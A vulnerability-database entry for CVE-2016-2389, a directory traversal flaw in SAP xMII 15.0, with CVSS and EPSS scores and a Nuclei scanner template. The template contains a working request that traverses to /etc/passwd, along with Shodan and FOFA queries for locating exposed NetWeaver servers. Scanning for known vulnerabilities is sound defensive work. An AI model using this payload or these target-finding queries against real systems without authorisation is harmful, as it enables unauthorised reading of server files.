Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-2389
HistoryAug 06, 2021 - 5:35 p.m.

SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion

2021-08-0617:35:56
ProjectDiscovery
github.com
3

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.221 Low

EPSS

Percentile

96.5%

SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a … (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.

id: CVE-2016-2389

info:
  name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
  author: daffainfo
  severity: high
  description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: |
    Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.
  reference:
    - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
    - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
    - https://www.exploit-db.com/exploits/39837/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
    - http://seclists.org/fulldisclosure/2016/May/40
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-2389
    cwe-id: CWE-22
    epss-score: 0.24589
    epss-percentile: 0.96217
    cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver
    shodan-query:
      - http.favicon.hash:-266008933
      - cpe:"cpe:2.3:a:sap:netweaver"
    fofa-query: icon_hash=-266008933
  tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008144b205c7662e0eca54703fa0e4517f6d11721064f2154aaff062ea256ac77002207d8fc8e109ec4a413f84f95841098e75be2fa5a326723d345568ac7f40cac57f:922c64590222798bb761d5b6d8e72950

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.3 High

AI Score

Confidence

High

0.221 Low

EPSS

Percentile

96.5%